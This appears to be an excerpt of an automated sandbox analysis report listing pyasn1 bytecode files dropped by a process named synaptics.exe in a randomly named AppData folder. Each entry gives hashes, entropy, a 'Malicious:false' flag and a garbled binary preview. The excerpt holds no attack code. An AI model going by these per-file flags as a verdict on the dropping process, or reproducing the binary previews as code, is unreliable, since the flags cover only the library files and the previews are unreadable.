                                                                                                                                                                                                            SHA-256:7819421B22D514DC5A12650F977581425283ADE8907EB9C7CDD376DF92F3C944
                                                                                                                                                                                                            SHA-512:4ED23E9799491F01D4545E9B29DE23A8888411E1FB8BC346DF24A16F59739951F18D9FE9764B3F618C23695E59AE3D03D577C749ACEFC4EE4CDC4767817F03F7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..gp........................@...s....e...Z.d.S.).N)...objectZ._MISSING..r....r.....SC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\compat\__init__.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):431
                                                                                                                                                                                                            Entropy (8bit):4.9511440555938435
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:C3PXrC664jlsSuD2TZmfsr1lA0ikdOZqqJ:6PaSU28f8ykUZqqJ
                                                                                                                                                                                                            MD5:73E023C0FF10D946A940FB5460990218
                                                                                                                                                                                                            SHA1:BA55143E652EA41FE90AE20D9A517872B8043FFE
                                                                                                                                                                                                            SHA-256:8F114001EEA90228B245ABDFE3BE612975E0FBCB66189D75BD9A4794D67F58CF
                                                                                                                                                                                                            SHA-512:A3794F15402EFD1283E839C83FAD269A429575D6383D0B3D10B2C027112FD3492DF54E078CDB6A17E56770ACEB79F40040904126D87D397FFFA55252959C46F2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g.........................@...s....d.d.d...Z.d.S.).F.....c....................C...sJ...t.|.....|...}.|.r.|.d...d.k.r.|.d.7.}.|.j.|.d...|.d...r.d.p.d...d.|.d...S.).N.....r...........big)...signed)...max..bit_length..to_bytes)...valuer......length..r.....RC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\compat\integer.pyr........s..........$.r....N).Fr....).r....r....r....r....r......<module>....s......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):174
                                                                                                                                                                                                            Entropy (8bit):4.6371759219341815
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:y/PvKGtuleh/wZWe05Ot+kiE2J5dj/a6iVWrzL1KLLikcTgp:y/3KCqeh/wpwkn23h/a/ArdKLLy4
                                                                                                                                                                                                            MD5:3CDB1C6D8E58D666ACAC66705D25283E
                                                                                                                                                                                                            SHA1:D667B295D775503637DC4ECB73C3526B57A01809
                                                                                                                                                                                                            SHA-256:1B1A2E42E41005337B8BFC266ECA34AA1264A4C11633E5AD5C2875B6B96976D9
                                                                                                                                                                                                            SHA-512:DB55606A0F614777FD1B46583817482246B563C345C5DE8F4396DE10C2CD2E6D4DAC1C19A6D8B956635753B35C542176A50B13F6F866A827FC37F96515A42DC3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g;........................@...s....d.S.).N..r....r....r.....QC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\type\__init__.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):21834
                                                                                                                                                                                                            Entropy (8bit):5.253950363568355
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:Qd+3khvV7gSPy9VQYmqBB00ygJxUxWmOIwWbV+AgSbCiFFQQVXycnSQ1MtWdtcVo:QMkhvV7gSPy9VQYmqBB00ygfUxWmOIwY
                                                                                                                                                                                                            MD5:20CC8878EF1BC80E05F472B4372636A4
                                                                                                                                                                                                            SHA1:1FCCB251A5E1BD02E9A57F6FDCA1DC924ECDD282
                                                                                                                                                                                                            SHA-256:9DA08C4D8106BD0D1C234BF18E4A3AFD2BBCBB3CE1830A7D323D1DE9089A8548
                                                                                                                                                                                                            SHA-512:25B74529809F21408E149DE2949FCFA78BEB3F4AF9F067833C19E11FFEF9D7875865F232B8BFA1094D96B6AB3D3F23ED93C346206C518E5EF04FEA8DC8AD4F8F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g"V.......................@...s....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e.Z.G.d.d...d.e...Z.e...Z.G.d.d...d.e...Z.e.Z.G.d.d...d.e...Z.e.Z.d.S.)......N)...error)...constraint)...tag)...tagmap)...Asn1Item..Asn1Type..SimpleAsn1Type..ConstructedAsn1Typec....................@...s....e.Z.d.Z.e.d.d.d.....Z.d.S.).r.........c....................C...s4...z.t...j.|.7..._.W.t.j.S...t.y.......|.t._.Y.t.j.S.w...N).r....Z._typeCounter..AttributeError)...cls..increment..r.....MC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\type\base.py..getTypeId....s..................z.Asn1Item.getTypeIdN).r....)...__name__..__module__..__qualname__..classmethodr....r....r....r....r....r........s..........r....c....................@...s....e.Z.d.Z.d.Z.e.....Z.e.....Z.d.Z.d.d...Z.d.d...Z.d.d...Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.d#d.d...Z.d#d.d...Z.e.d.d.....Z.d$d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d ..Z.d!d"..Z.d.S.)%r....a>...Base
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5603
                                                                                                                                                                                                            Entropy (8bit):5.106562247932023
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:ThAsswL3b31sUQblFm1dSGaL4in/lqaW5P3ftlSCowp9yQu9MURWu3nph9K:tAsbz1s9bn3GaEicaWR3f2+9ruSURWu8
                                                                                                                                                                                                            MD5:167C2E03D59CE9DA6BBEEB69B9C6FEA7
                                                                                                                                                                                                            SHA1:E98FFCD93B428AC8A191ED121262DE19C18A6322
                                                                                                                                                                                                            SHA-256:DF1882F3E74E2F63B1305D396206500271064F664323B2C632902DF8936CEC2E
                                                                                                                                                                                                            SHA-512:0DB0F678AD69903A4CE8F39F564C1A0668F336B795361E19E33A9951FD48EDDAAAC19BC4B7A9FA8AA7D2BA845E5053657E7B8B1B0A7F8D1E69D78108E984884C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g.$.......................@...s&...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.e.j.Z.e.j.Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d d!..d!e...Z.d.S.)".....N)...error)...tag)...univ)...NumericString..PrintableString..TeletexString..T61String..VideotexString..IA5String..GraphicString..VisibleString..ISO646String..GeneralString..UniversalString..BMPString..UTF8Stringc....................@...sV...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.S.)...AbstractCharacterStringa....Creates |ASN.1| schema or value object... |ASN.1| class is based on :class:`~pyasn1.type.base.SimpleAsn1Type`,. its objects are immutable and duck-type :class:`bytes`.. When used in octet-stream context, |ASN.1| type assumes. "|encoding|" encoding... Keyword Args. -----------
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):23718
                                                                                                                                                                                                            Entropy (8bit):5.134142337196262
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:WYM3gCqqRCO/Wsd9fTiuYOseVCTet2K4fnORtAlxkVUjNptXeW8na+MVMru:xDCNRDxBGlO3VmrfnORtUkC1eW6XMVMi
                                                                                                                                                                                                            MD5:5E2B0B815057E853C85DD0AB33EA4329
                                                                                                                                                                                                            SHA1:64D764D3331AF16573DBEA7C62ACCA2CC149260C
                                                                                                                                                                                                            SHA-256:5F2121649049378051562CBEF807BA58FE9B337E5A5B8E54A8387AE977D594E9
                                                                                                                                                                                                            SHA-512:A0D9AAF9308307192D55E5C117262CF366FA97E40D9D2526742A691B4441BC11DD9885D1FAD426B4A18D8F6F96611490A6A583CC69B272CD771FC8E83F7A491A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g.U.......................@...s....d.d.l.Z.d.d.l.m.Z...g.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.) .....N)...error)...SingleValueConstraint..ContainedSubtypeConstraint..ValueRangeConstraint..ValueSizeConstraint..PermittedAlphabetConstraint..InnerTypeConstraint..ConstraintsExclusion..ConstraintsIntersection..ConstraintsUnionc....................@...s....e.Z.d.Z.d.d...Z.d"d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d.S.)#..AbstractConstraintc....................G...s*...t...|._.|...|.....t.|.j.j.|.j.f...|._.d.S...N)...set.._valueMap.._setValues..hash..__class__..__name__.._values.._AbstractConstraint__hash....self..values..r.....SC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\type\constraint.py
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):390
                                                                                                                                                                                                            Entropy (8bit):4.758663632598017
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:y/3mFYNbsu3gMlCep2AInXx9YLIKP66GS9o7Iwkn23h/a/ArdKxqXKUeh/QGD7/w:C3mqNQEgYCeeQ2nfsxxsneh/j7/W+ho
                                                                                                                                                                                                            MD5:79D79F8D6173CF8A62A6F388E0675806
                                                                                                                                                                                                            SHA1:B3A4B5E1FF2F938EDD63E7F31698277502521400
                                                                                                                                                                                                            SHA-256:05215BA9DAFBE0BF1487B06DA3039BF7A6EDEB0A469BBCA4E2EE730F90F03912
                                                                                                                                                                                                            SHA-512:C6C6DEDB9BF3FDF8AC4C46D5068F332A8C4316801FE104EEBD1C6C023F472C59514FB6CDB9B9CB67D2C0FF5BDF1A44C734BF00AF2D1E82EA52636D9AF033B4A1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g.........................@...s ...d.d.l.m.Z...G.d.d...d.e...Z.d.S.)......)...PyAsn1Errorc....................@...s....e.Z.d.Z.d.S.)...ValueConstraintErrorN)...__name__..__module__..__qualname__..r....r.....NC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\type\error.pyr........s........r....N).Z.pyasn1.errorr....r....r....r....r....r......<module>....s........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):18341
                                                                                                                                                                                                            Entropy (8bit):5.141476386190373
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:gsQFORXOxlx+se3L2qeWNqb4UF1ducijQxfA3HtADIrt:qF6ql8sgL2HWNq8UF1ducijQxf2rt
                                                                                                                                                                                                            MD5:14A534108EBBBDA470813FFB6A442602
                                                                                                                                                                                                            SHA1:F4C0A904E8373C1245CCC4E8514BCC0892AB328D
                                                                                                                                                                                                            SHA-256:6123CA33FD5E767278A2652EFAEA7329522222D908029EA137A85DEF9FB3A01F
                                                                                                                                                                                                            SHA-512:84C88AF5FA5E1DBE068B709350336E8CB8E51830EB2E869BA9643A42CCB835385559B63CE009F5479A13C1D6163689DA389C0C4A77E838BC3F2398C27B913004
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g3?.......................@...sx...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.)......N)...error)...tag)...tagmap)...NamedType..OptionalNamedType..DefaultedNamedType..NamedTypesc....................@...s....e.Z.d.Z.d.Z.d.Z.d.Z.d$d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.d d!..Z.d"d#..Z.d.S.)%r....a....Create named field object for a constructed ASN.1 type... The |NamedType| object represents a single name and ASN.1 type of a constructed ASN.1 type... |NamedType| objects are immutable and duck-type Python :class:`tuple` objects. holding *name* and *asn1Object* components... Parameters. ----------. name: :py:class:`str`. Field name.. asn1Object:. ASN.1 type object. FNc....................C...s ...|.|._.|.|._.|.|.f.|._.|.|._.d.S...N)..._NamedType__name.._NamedType__type.._NamedType__na
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5482
                                                                                                                                                                                                            Entropy (8bit):5.1458284017483
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:v7bLr4jGns+GAwQvrrmPzKJzXzr72xL2LWHbIGpwhShNC4nxxrWqYx5qiwd:Ajcs+GAwQTrmGh2xgWHkGOkhVnxxrahY
                                                                                                                                                                                                            MD5:B20B3C4CC2F80C3CE76247AACA98A0E1
                                                                                                                                                                                                            SHA1:BCB6095D69665D8CB7F4EC3BD538D47FDE465753
                                                                                                                                                                                                            SHA-256:285FB8B2F979AA4CB7DC7DADB12124116DE7928E971D9F78CDC7476E0C474D34
                                                                                                                                                                                                            SHA-512:ED88FAABCBCD3FDC492736BBEA7AE010F349D031B68D86A98D498D4CD37E63EA43895648A10C3095BFB03A3726075F6C8D7B94E3039CD94756B1B54E82EDFF9A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g#........................@...s&...d.d.l.m.Z...d.g.Z.G.d.d...d.e...Z.d.S.)......)...error..NamedValuesc....................@...s....e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d&d'..Z.d(d)..Z.d*d+..Z.d,S.)-r....a....Create named values object... The |NamedValues| object represents a collection of string names. associated with numeric IDs. These objects are used for giving. names to otherwise numerical values... |NamedValues| objects are immutable and duck-type Python. :class:`dict` object mapping ID to name and vice-versa... Parameters. ----------. *args: variable number of two-element :py:class:`tuple`.. name: :py:class:`str`. Value label.. value: :py:class:`int`. Numeric value.. Keyword Args. ------------. name: :py:class:`str`. Value label.. value: :py:class:`int`. Numeric valu
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10203
                                                                                                                                                                                                            Entropy (8bit):5.028037688304681
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:cOjGsnVvD7K+qqlTckRWnzSO4U/KNrNr2RPb0qn:THnVb7/HRWnZ4U/xb0q
                                                                                                                                                                                                            MD5:D270AFB7648E3136FC94D13F7097C82B
                                                                                                                                                                                                            SHA1:09E046D61C77257B51A5F1A05F1585D629D984FC
                                                                                                                                                                                                            SHA-256:37EBFFB7B0E93DCC5F0E6456032F7ADF4FB0F6122C3DCF7E4A81D991DB77671A
                                                                                                                                                                                                            SHA-512:471BFB7F0CA3BBB4F4F65D7167DABFD09A811AEE51CC51F0FC44F437C0173F3A210A0A20D0F1EA51096D1E6B4AB1E9757678DA2F661E3CAB83407CCB6C783290
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g.%.......................@...sd...d.d.l.m.Z...g.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.d...Z.d.S.)......)...error)...tagClassUniversal..tagClassApplication..tagClassContext..tagClassPrivate..tagFormatSimple..tagFormatConstructed..tagCategoryImplicit..tagCategoryExplicit..tagCategoryUntagged..Tag..TagSet.@............. ..................c....................@...s....e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.d.....Z.e.d.d.....Z.e.d d!....Z.d"S.)#r....a....Create ASN.1 tag.. Represents ASN.1 tag that can be attached to a ASN.1 type to make. types distinguishable from each other... *Tag* objects are immutable and duck-type Python :class:`tuple` objects. holding three integer components of a tag... Parameters. ----------. tagClass: :py:class:`int`. Tag *class* value.. tagFormat: :py:class:`int`. Tag *format* value.. tagId: :
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3303
                                                                                                                                                                                                            Entropy (8bit):5.139589165853379
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:L7uO+EKaC/KIO00QLMmp6ygzg43BYEASd9uh9DYCfCEfXn+KZm667D0Kv19HpqEo:Ot0P0oygTxYwfuh9DYlaO+6HNvXHpqEo
                                                                                                                                                                                                            MD5:4E626BAF6EE84EB8FF5D7DF86D374F17
                                                                                                                                                                                                            SHA1:A7CFBC3CB10E143E11DD421E4BDAFB3AD887CEA3
                                                                                                                                                                                                            SHA-256:58373FC9E3B14358A556EB804CED834D0A7810B2908927B8D0F9F49570B5C439
                                                                                                                                                                                                            SHA-512:5C50E7643D1E5AEB2C487B8137962B00E07E8C6EE837DE8F930CF143B7BF0183829B7549A5AC0C9477831955F5AA76DE1C76F4FCDA365E1F1E1ECE5FAFA87D87
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g.........................@...s&...d.d.l.m.Z...d.g.Z.G.d.d...d.e...Z.d.S.)......)...error..TagMapc....................@...sv...e.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.S.).r....aF...Map *TagSet* objects to ASN.1 types.. Create an object mapping *TagSet* object to ASN.1 type... *TagMap* objects are immutable and duck-type read-only Python. :class:`dict` objects holding *TagSet* objects as keys and ASN.1. type objects as values... Parameters. ----------. presentTypes: :py:class:`dict`. Map of :class:`~pyasn1.type.tag.TagSet` to ASN.1 objects considered. as being unconditionally present in the *TagMap*... skipTypes: :py:class:`dict`. A collection of :class:`~pyasn1.type.tag.TagSet` objects considered. as absent in the *TagMap* even when *defaultType* is present... defaultType: ASN.1 type object. An ASN.1 type object callee *TagMap* returns for
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):93776
                                                                                                                                                                                                            Entropy (8bit):5.299615220922268
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:SltBPPmHi1lw8zdxtKNaRdsSxRQxZvzEIAYWTJdqH/uN6xjjQT/8kKXDlCydymtD:Snw8pxtKNaRdsSxRQxZvzEIAYWTJdqH1
                                                                                                                                                                                                            MD5:CAA00F3DA25049F4E283AF1787C313DA
                                                                                                                                                                                                            SHA1:C460A489C4F825F64DFDEBCE05EC7EE62E668148
                                                                                                                                                                                                            SHA-256:4335232CA99B518419DCEA2E801991382773FCB0FAAABED2F34C6DCAA16BD86E
                                                                                                                                                                                                            SHA-512:E2FBC2CEA1382BF46BEB6A32402408FE75382F3E3C24FCE003DB8165762303908DD560490B59745C510155C70E441EA6845049E53A91297881877A5D3B0B6F97
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.Z.e...Z.g.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d d!..d!e.j...Z.G.d"d#..d#e...Z G.d$d%..d%e...Z!G.d&d'..d'e.j...Z"G.d(d)..d)e"..Z#G.d*d+..d+e"..Z$G.d,d-..d-e$..Z%G.d.d/..d/e...Z&d.S.)0.....N)...error)...eoo)...integer)...base)...constraint)...namedtype)...namedval)...tag)...tagmap)...Integer..Boolean..BitString..OctetString..Null..ObjectIdentifier..Real..Enumerated..SequenceOfAndSetOfBase..SequenceOf..SetOf..SequenceAndSetBase..Sequence..Set..Choice..Any..NoValue..noValuec....................@...s....e.Z.d.Z.d.Z.e...e...e.j.e.j.d.....Z.e.....Z.e.....Z.e.j.....Z.e.f.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z d.d...Z!d.d...Z"
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):93776
                                                                                                                                                                                                            Entropy (8bit):5.299615220922268
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:SltBPPmHi1lw8zdxtKNaRdsSxRQxZvzEIAYWTJdqH/uN6xjjQT/8kKXDlCydymtD:Snw8pxtKNaRdsSxRQxZvzEIAYWTJdqH1
                                                                                                                                                                                                            MD5:CAA00F3DA25049F4E283AF1787C313DA
                                                                                                                                                                                                            SHA1:C460A489C4F825F64DFDEBCE05EC7EE62E668148
                                                                                                                                                                                                            SHA-256:4335232CA99B518419DCEA2E801991382773FCB0FAAABED2F34C6DCAA16BD86E
                                                                                                                                                                                                            SHA-512:E2FBC2CEA1382BF46BEB6A32402408FE75382F3E3C24FCE003DB8165762303908DD560490B59745C510155C70E441EA6845049E53A91297881877A5D3B0B6F97
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.Z.e...Z.g.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d d!..d!e.j...Z.G.d"d#..d#e...Z G.d$d%..d%e...Z!G.d&d'..d'e.j...Z"G.d(d)..d)e"..Z#G.d*d+..d+e"..Z$G.d,d-..d-e$..Z%G.d.d/..d/e...Z&d.S.)0.....N)...error)...eoo)...integer)...base)...constraint)...namedtype)...namedval)...tag)...tagmap)...Integer..Boolean..BitString..OctetString..Null..ObjectIdentifier..Real..Enumerated..SequenceOfAndSetOfBase..SequenceOf..SetOf..SequenceAndSetBase..Sequence..Set..Choice..Any..NoValue..noValuec....................@...s....e.Z.d.Z.d.Z.e...e...e.j.e.j.d.....Z.e.....Z.e.....Z.e.j.....Z.e.f.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z d.d...Z!d.d...Z"
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):93776
                                                                                                                                                                                                            Entropy (8bit):5.299615220922268
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:SltBPPmHi1lw8zdxtKNaRdsSxRQxZvzEIAYWTJdqH/uN6xjjQT/8kKXDlCydymtD:Snw8pxtKNaRdsSxRQxZvzEIAYWTJdqH1
                                                                                                                                                                                                            MD5:CAA00F3DA25049F4E283AF1787C313DA
                                                                                                                                                                                                            SHA1:C460A489C4F825F64DFDEBCE05EC7EE62E668148
                                                                                                                                                                                                            SHA-256:4335232CA99B518419DCEA2E801991382773FCB0FAAABED2F34C6DCAA16BD86E
                                                                                                                                                                                                            SHA-512:E2FBC2CEA1382BF46BEB6A32402408FE75382F3E3C24FCE003DB8165762303908DD560490B59745C510155C70E441EA6845049E53A91297881877A5D3B0B6F97
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.Z.e...Z.g.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d d!..d!e.j...Z.G.d"d#..d#e...Z G.d$d%..d%e...Z!G.d&d'..d'e.j...Z"G.d(d)..d)e"..Z#G.d*d+..d+e"..Z$G.d,d-..d-e$..Z%G.d.d/..d/e...Z&d.S.)0.....N)...error)...eoo)...integer)...base)...constraint)...namedtype)...namedval)...tag)...tagmap)...Integer..Boolean..BitString..OctetString..Null..ObjectIdentifier..Real..Enumerated..SequenceOfAndSetOfBase..SequenceOf..SetOf..SequenceAndSetBase..Sequence..Set..Choice..Any..NoValue..noValuec....................@...s....e.Z.d.Z.d.Z.e...e...e.j.e.j.d.....Z.e.....Z.e.....Z.e.j.....Z.e.f.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z d.d...Z!d.d...Z"
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4406
                                                                                                                                                                                                            Entropy (8bit):5.428978975612528
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:JHaqgsRPefkBzr3Acd0XPSWhXgxTdeqTALFI8WoTFfI7YHpiZA:YTeIklA00/Sc6nTgFIDoJg7YHJ
                                                                                                                                                                                                            MD5:783DF0BBF8DE7DD9462C9AB495762318
                                                                                                                                                                                                            SHA1:1CEA29086D7D8B38F0EB102D756C89973A41488B
                                                                                                                                                                                                            SHA-256:BDF49E173B3E8078C671310DA6ECFE7B8DAAECC7F4BFF4BE330A1C31F18591B7
                                                                                                                                                                                                            SHA-512:4F945427C006379968CB3F4F9E5807A1164478893F0CFE0D101B10EAD3912F13A7EE4AD278C0867A2F52164832E2178F8EBC885802E08EF1EC671239CED9BF5E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
